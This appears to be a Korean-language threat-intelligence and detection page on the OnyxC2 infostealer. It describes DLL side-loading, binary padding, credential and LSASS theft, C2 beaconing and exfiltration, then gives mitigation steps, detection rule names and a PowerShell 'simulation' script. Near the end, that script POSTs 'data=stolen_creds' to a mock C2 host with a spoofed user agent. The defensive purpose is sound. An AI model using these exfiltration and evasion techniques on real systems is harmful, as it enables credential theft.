팔로우 
요약
OnyxC2는 인증 정보, 이중 인증 확장 및 암호화폐 지갑을 약 210개 애플리케이션에서 탈취하도록 설계된 신흥 멀웨어 서비스형 정보 탈취 도구입니다. 이 플랫폼은 관리 패널, 빌더 및 원격 액세스 기능을 포함한 전체 상업형 툴킷을 제공합니다. 또한 크기 초과 서명된 바이너리 및 암호화된 페이로드 구성 요소와 같은 고급 회피 방법을 사용합니다.
조사
BlackFog 연구원들은 여러 OnyxC2 샘플을 조사하여 NVIDIA 그래픽 라이브러리로 위장한 120MB 이상의 악성 DLL과 함께 서명된 호스트 실행 파일을 악용하는 DLL 사이드 로딩 방식을 발견했습니다. 네트워크 분석 결과, 맬웨어가 특정 백엔드 API 끝점과 HTTPS를 통해 통신하는 것이 확인되었습니다. 연구원들은 또한 DLL 내에 내장된 암호화된 오버레이를 발견했으며, 이는 맬웨어가 간단한 정적 분석을 피할 수 있도록 도와줍니다.
완화
엔드포인트에 데이터 유출 방지 제어를 배치하면 어떤 프로세스를 사용하든지 관계없이 비인가 아웃바운드 트래픽을 차단하는 데 도움이 됩니다. 보안 팀은 서명된 바이너리와 관련된 의심스러운 DLL 로드를 모니터링하고 사용자 쓰기 가능한 경로에 나타나는 비정상적으로 큰 파일을 조사해야 합니다. 강력한 애플리케이션 제어 정책과 비인가된 예약 작업을 모니터링하는 것도 권장됩니다.
대응
OnyxC2 활동이 감지되면 추가 데이터 도난을 막기 위해 즉시 영향을 받은 시스템을 격리하십시오. 복호화된 페이로드를 복구하기 위해 전체 메모리 덤프를 캡처하고 활성 HVNC 세션이나 SOCKS5 프록시 활동이 있는지 확인하십시오. 최근에 생성된 모든 예약 작업을 검토하고 브라우저 인증서 저장소를 조사하여 손상 증거를 찾으십시오.
graph TB %% 클래스 정의 classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% 초기 접근 및 실행 action_user_exec[“<b>행위</b> – <b idea=’T1204.002’>사용자 실행: 악성 파일</b><br/>설명: 피해자는 비밀번호로 보호된 압축 파일을 다운로드하도록 유도되며,<br/>해당 파일에는 정상 소프트웨어로 위장한<br/>악성 설치 프로그램이 포함되어 있다.”] class action_user_exec action action_side_loading[“<b idea=’T1574.002’>실행 흐름 탈취: DLL 사이드 로딩</b><br/>설명: 합법적이고 디지털 서명된 실행 파일을 사용하여<br/>borlndmm.dll이라는 악성으로 팽창된 DLL을<br/>로드한다.”] class action_side_loading action malware_dll[“<b idea=’T1027.001’>난독화된 파일 또는 정보: 바이너리 패딩</b><br/>설명: DLL은 120MB 이상으로 팽창되며,<br/>정상적인 NVIDIA 그래픽 기능을 포함하여<br/>보안 스캐너 탐지를 회피한다.”] class malware_dll malware %% 지속성 및 명령·제어 action_persistence[“<b idea=’T1547’>지속성</b><br/>설명: 예약 작업을 통한 선택적<br/>자동 실행 기능을 사용한다.”] class action_persistence action action_c2[“<b idea=’T1071.001’>명령 및 제어: 애플리케이션 계층 프로토콜</b><br/>설명: HTTPS를 통해 /backend/api/app.php로<br/>주기적인 비콘 통신을 수행하며, 종종 Cloudflare를<br/>사용하여 은닉성을 높인다.”] class action_c2 action %% 탐색 및 자격 증명 접근 action_discovery[“<b idea=’T1217’>탐색</b><br/>설명: Chromium 및 Gecko 기반 브라우저 45종에서<br/>저장된 로그인 정보와 쿠키를 포함한<br/>브라우저 정보를 수집한다.”] class action_discovery discovery action_cred_mgr[“<b idea=’T1555.005’>자격 증명 접근: 비밀번호 관리자 자격 증명</b><br/>설명: 자격 증명을 탈취하기 위해<br/>5개의 서로 다른 비밀번호 관리자 애플리케이션을 대상으로 한다.”] class action_cred_mgr discovery action_lsass[“<b idea=’T1003.001’>자격 증명 접근: 운영체제 자격 증명 덤프</b><br/>설명: LSASS 메모리를 덤프하여<br/>자격 증명을 획득한다.”] class action_lsass discovery %% 데이터 유출 action_exfil[“<b idea=’T1041’>C2 채널을 통한 데이터 유출</b><br/>설명: 비밀번호, 쿠키 및 지갑 정보 등 탈취된 데이터가<br/>action=up_d 요청을 통해<br/>업로드된다.”] class action_exfil exfiltration %% 연결 흐름 action_user_exec –>|이어짐| action_side_loading action_side_loading –>|사용함| malware_dll malware_dll –>|구축함| action_persistence action_persistence –>|시작함| action_c2 action_c2 –>|유발함| action_discovery action_discovery –>|이어짐| action_cred_mgr action_discovery –>|이어짐| action_lsass action_cred_mgr –>|데이터를_제공함| action_exfil action_lsass –>|데이터를_제공함| action_exfil action_exfil –>|통신에_사용함| action_c2
공격 흐름
탐지
DNS 요청을 통한 비정상적인 최상위 도메인(TLD) DNS 요청에 의한 의심스러운 명령 및 제어
보기
탐지할 IOC (HashSha256): 210개 앱을 겨냥한 새로운 스틸러 OnyxC2 내부
보기
탐지할 IOC (SourceIP): 210개 앱을 겨냥한 새로운 스틸러 OnyxC2 내부
보기
탐지할 IOC (DestinationIP): 210개 앱을 겨냥한 새로운 스틸러 OnyxC2 내부
보기
OnyxC2 스틸러 C2 통신 및 TOR 익명화 [프록시] 감지
보기
OnyxC2 예약 작업 자동 실행 및 키로거 활동 탐지 [Windows 프로세스 생성]
보기
시뮬레이션 실행
필수조건: 원격 측정 및 기준선 프리플라이트 검사를 통과해야 합니다.
이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적군 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령어와 내러티브는 식별된 TTP와 직접 일치해야 하며, 탐지 로직에서 예상되는 정확한 원격 측정을 생성해야 합니다. 추상적이거나 관련 없는 예시를 사용하면 오진으로 이어질 수 있습니다.
-
공격 내러티브 및 명령: 적군은 도난된 브라우저 인증 정보를 유출하려고 합니다. 네트워크 보안 모니터링에 의한 탐지를 피하기 위해 휴대용 Tor 바이너리를 배포하여 익명 터널을 만듭니다. 터널이 설정되면 맬웨어는 C2 서버에 연결을 시도합니다. 합법적인 웹 트래픽으로 위장하기 위해 맬웨어는 ‘Cloudflare’로 보이는 사용자 에이전트를 가장하고 Cloudflare 프록시 뒤에 호스팅된 특정 API 끝점을 목표로 설정합니다. 이 시퀀스는 탐지 규칙의 상관관계를 유발하기 위해 설계되었습니다.
tor명령 줄 인수와 특정/backend/api/app.phpURL 패턴. -
회귀 테스트 스크립트:
# OnyxC2 스틸러 통신 시뮬레이션 # 1. Tor 존재 시뮬레이션 (더미 파일/프로세스 동작 생성) # 실제 시나리오에서는 실제 tor.exe일 것입니다. $TorPath = "$env:TEMPtor.exe" "시뮬레이션된 Tor 바이너리 콘텐츠" | Out-File -FilePath $TorPath # 'tor'를 명령줄로 시작하는 프로세스 실행 이벤트 생성 Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # 탐지 논리 'command_line|contains: tor' 설정을 보장하기 위해, # 문자열 'tor'가 포함된 명령을 실행합니다. cmd.exe /c "echo initializing tor proxy..." # 2. C2 네트워크 연결 시뮬레이션 # 특정 URL 및 사용자 에이전트를 사용하여 네트워크 연결을 시뮬레이션하기 위해 PowerShell을 사용합니다. $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Attempting C2 communication to $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
정리 명령:
# 시뮬레이션된 아티팩트 제거 Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "시뮬레이션 정리 완료."